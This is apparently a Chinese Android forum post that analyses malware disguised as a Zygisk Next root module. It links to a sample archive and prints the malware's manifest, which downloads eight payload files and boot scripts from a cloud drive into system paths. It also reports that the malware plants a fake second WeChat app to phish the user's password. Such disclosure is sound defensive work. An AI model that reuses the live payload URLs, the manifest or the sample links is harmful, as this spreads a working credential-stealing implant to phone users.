本帖最后由 ulyanov2233 于 2025-8-19 12:06 编辑
【3.zip】
链接:https://qfile.qq.com/q/7T2sgynLGw
https://wormhole.app/NJzr2O#7_C05EZ07ZByaJ-ys88O2w
该病毒伪装成zygisk next等常见模块,待使用者刷入之后,通过123网盘下载攻击载荷{
"files": [
{
"url": "https://vip.123pan.cn/1850486109/d/a",
"path": "/data/local/vendor/a",
"hash": "7b14d0f40636b20d5d8d9b87c6e8374b7e255b5e2cf0f6b5d5b472f80de99d83",
"execute": false
},
{
"url": "https://vip.123pan.cn/1850486109/d/b",
"path": "/data/local/vendor/b",
"hash": "044eb0f70394e1af92b493887ddabc466da5bf4917fc5e0e91fd70ee7b74dce2",
"execute": false
},
{
"url": "https://vip.123pan.cn/1850486109/d/k",
"path": "/data/local/vendor/k",
"hash": "4a30d8e1406e445131cc3db6954c61298bd19fac031bf27a0bfc89413d66eb28",
"execute": false
},
{
"url": "https://vip.123pan.cn/1850486109/d/p",
"path": "/data/local/vendor/p",
"hash": "f42ab08d72e8193552db1ee1a272aa9e69c8b26bb109f3613e13db7135e49407",
"execute": false
},
{
"url": "https://vip.123pan.cn/1850486109/d/0.sh",
"path": "/data/adb/service.d/0.sh",
"hash": "c1822345eef167c7f567d4f6eebab2a92076dae76e02b439d8919452c18f81ca",
"execute": false
},
{
"url": "https://vip.123pan.cn/1850486109/d/1.sh",
"path": "/data/adb/service.d/1.sh",
"hash": "34dc23d2124e6d457bdf73ff5475bc7a014ef294e452e78dab228dea55c308de",
"execute": true
},
{
"url": "https://vip.123pan.cn/1850486109/d/2.sh",
"path": "/data/adb/service.d/2.sh",
"hash": "48aed12603e9f311d855524594a6f0bab8c0e843852e36fd5ed348a2629d02a1",
"execute": false
},
{
"url": "https://vip.123pan.cn/1850486109/d/3.sh",
"path": "/data/adb/service.d/3.sh",
"hash": "9002a5d9b2a54fc81ca7dbbf4167c03de984933b7398df5448bb63505bc07581",
"execute": true
}
]
}
对应远控才地址已经发到毒网区
下载的文件用途如图所示:
最后攻击效果如图,使得受害者手机内出现两个微信,引诱受害者输入微信密码:
|